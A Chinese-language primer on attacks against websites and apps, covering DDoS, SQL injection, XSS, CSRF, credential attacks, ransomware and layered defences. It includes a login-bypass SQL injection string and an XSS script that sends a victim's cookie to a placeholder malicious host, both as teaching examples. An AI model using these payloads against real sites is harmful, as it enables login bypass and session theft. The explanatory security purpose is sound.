一、攻击者在攻击什么
网站和App是用户直接接触的服务入口,也是攻击者最常瞄准的目标。攻击者盯上的无非是三样东西:
数据。用户凭证、个人信息、交易记录、商业机密——这些数据在地下市场有明确的交易价值。
服务可用性。让网站或App无法访问,可能出于商业竞争、勒索或单纯的破坏目的。
系统控制权。获取服务器或应用的控制权限,将其作为进一步攻击的跳板,或植入后门长期潜伏。
理解这个前提,再看各种攻击类型,就能明白它们分别瞄准的是哪一个目标。
二、DDoS攻击:让服务“忙不过来”
2.1 基本原理
DDoS(分布式拒绝服务攻击)的核心逻辑是:用海量无效请求占满目标系统的资源,让正常用户无法获得服务。
可以把它类比为:一群人涌进一家餐馆,把菜单上的菜品都点一遍却不付款,后厨忙于处理这些无效订单,真正想吃饭的顾客反而无法点餐。
DDoS的关键特征是分布式——攻击者控制大量分散的设备(僵尸网络),同时向目标发起请求。这些设备可能分布在全球各地,包括被感染的服务器、家用路由器、摄像头等物联网设备。
2.2 主要类型
流量型攻击的目标是占满网络带宽。UDP Flood向目标发送大量UDP数据包;ICMP Flood发送大量Ping请求。反射放大攻击则更隐蔽:攻击者伪造受害者的IP地址,向DNS、NTP等第三方服务器发送小请求,这些服务器将放大数十倍甚至数百倍的响应数据发往受害者。
协议层攻击利用协议机制缺陷。SYN Flood是最典型的例子:攻击者发送大量伪造源IP的SYN请求,但不完成TCP三次握手,服务器为每个请求分配资源等待确认,大量半开连接最终占满连接队列。
应用层攻击模拟正常用户行为。HTTP Flood发送大量看似合法的GET或POST请求,耗尽Web服务器的处理能力。由于这些请求与正常用户请求难以区分,传统的流量清洗设备往往难以识别。
2.3 防御思路
DDoS防御需要分层部署:流量清洗设备在入口处过滤恶意流量;CDN将攻击流量分散到多个节点;弹性带宽在攻击期间动态扩容;WAF在应用层识别和拦截异常请求。
三、Web应用攻击:利用代码和配置的弱点
3.1 SQL注入
SQL注入的原理是:Web应用未对用户输入做充分过滤,攻击者将恶意SQL语句注入到输入参数中,后端服务器将恶意输入拼接到SQL语句中执行。
举例来说,一个登录接口的SQL查询可能是:
sql
SELECT * FROM users WHERE username = '输入的用户名' AND password = '输入的密码'
如果攻击者在用户名输入框中填入' OR '1'='1,查询条件就变成了恒真条件,攻击者可能绕过密码验证直接登录。
SQL注入的根本原因是代码与数据未做隔离——应用直接将用户可控输入拼接到SQL语句中,数据库将恶意输入当作SQL指令执行。防御的核心是使用参数化查询,确保用户输入始终被当作数据处理。
3.2 XSS(跨站脚本攻击)
XSS的攻击目标是其他用户,而非服务器本身。攻击者向Web页面注入恶意JavaScript脚本,当其他用户访问该页面时,脚本在用户浏览器中自动执行。
例如,一个评论功能如果未对用户输入做转义,攻击者可以在评论中嵌入:
html
<script>document.location='http://恶意站点/steal?cookie='+document.cookie</script>
当其他用户查看这条评论时,脚本执行,用户的Cookie被发送到攻击者控制的服务器。攻击者可以利用窃取的Cookie冒充用户身份。
XSS分为存储型(恶意脚本存入数据库)、反射型(脚本通过URL参数反射)和DOM型(客户端脚本处理不当)。存储型XSS危害范围最广,因为所有访问该页面的用户都会受到影响。
3.3 CSRF(跨站请求伪造)
CSRF利用的是用户已登录目标网站的身份。攻击者诱导用户点击一个链接或访问一个页面,该页面会自动向目标网站发起请求(如转账、修改密码),而浏览器会自动携带用户的Cookie。
防御CSRF的核心是Token校验:服务器在表单中嵌入一个随机Token,提交时验证Token是否匹配。攻击者无法预测Token值,因此无法构造有效的恶意请求。
四、身份与凭证攻击:不攻破系统,直接“登录”
2026年的威胁数据显示,身份弱点在近90%的调查事件中发挥了实质性作用。攻击者越来越多地不是“闯入”系统,而是使用被盗的凭证和令牌“登录”系统。
凭证填充是常见手法:攻击者利用从其他数据泄露中获得的用户名和密码组合,尝试登录目标系统。由于许多用户在多个平台重复使用密码,这种攻击的有效性相当高。
MFA绕过是另一个值得关注的方向。攻击者通过持续发送MFA请求(“MFA轰炸”),直到用户因厌烦而批准。更隐蔽的方式是攻击者自行注册受控的MFA设备,从而以合法身份出现。
五、恶意软件与勒索攻击
勒索软件加密目标系统的文件或锁定系统,要求支付赎金。最新变种呈现“先窃密、后加密”的双重施压模式——即使支付赎金,数据仍可能被公开。入侵渠道包括漏洞爆破、邮件附件、远程桌面弱口令等。
蠕虫病毒与普通病毒的最大区别是无需人为操作即可主动传播。利用系统漏洞、局域网共享或弱口令扫描,一台设备中招可能导致全网沦陷。
木马程序通常伪装成正常软件,用户运行后在其不知情的情况下执行恶意操作。常见的传播方式包括钓鱼邮件附件、伪装成常用工具的下载包等。
六、攻击链的典型阶段
一次完整的网络攻击通常遵循一定的阶段划分:
侦察阶段:攻击者收集目标信息,包括网络拓扑、开放端口、使用的软件版本、员工信息等。
初始访问:通过钓鱼邮件、漏洞利用、弱口令爆破等方式获得初步访问权限。2026年Verizon DBIR报告指出,利用软件漏洞已超越使用被盗密码,成为首次入侵系统的主要途径,31%的数据泄露事件源于漏洞利用。
权限提升与横向移动:获得初步访问后,攻击者尝试提升权限并在内网横向移动,寻找更有价值的目标。
数据窃取或加密:最终目标可能是窃取数据、加密文件或破坏系统。Palo Alto Networks的报告显示,最快的情况下,攻击者从初始访问到数据外泄仅需72分钟,比前一年快了4倍。
七、防御的基本思路
针对网站和App的攻击,防御需要覆盖多个层面:
网络层:流量清洗、DDoS防护、CDN加速。
应用层:WAF(Web应用防火墙)、输入验证、参数化查询、输出转义。
身份层:强密码策略、多因素认证、会话管理、异常登录检测。
终端层:端点检测与响应、防病毒、补丁管理。
数据层:加密存储、访问控制、备份与恢复。
管理层面:安全开发流程、定期渗透测试、应急响应预案。
需要留意的是,攻击面在持续迁移。2025年OWASP Top 10中,访问控制失效持续位居榜首,安全配置错误和软件供应链失效跃升至第二、第三位,传统的注入攻击排名有所下降。防御重心需要从“修补代码漏洞”扩展到“管理配置和供应链信任”。
八、总结
网站和App攻击的核心逻辑可以归纳为三个方向:
让服务不可用:DDoS攻击通过海量请求耗尽资源,使正常用户无法访问。
窃取数据或控制权:SQL注入、XSS、凭证填充等攻击利用代码漏洞或身份弱点,获取敏感数据或系统权限。
破坏完整性:勒索软件、木马、蠕虫等恶意软件篡改数据或加密文件,造成业务中断和数据损失。
理解这些攻击的原理和特征,是构建有效防御体系的前提。攻击面在变化,防御策略也需要随之调整——从单一的边界防护转向覆盖网络、应用、身份、终端的纵深防御。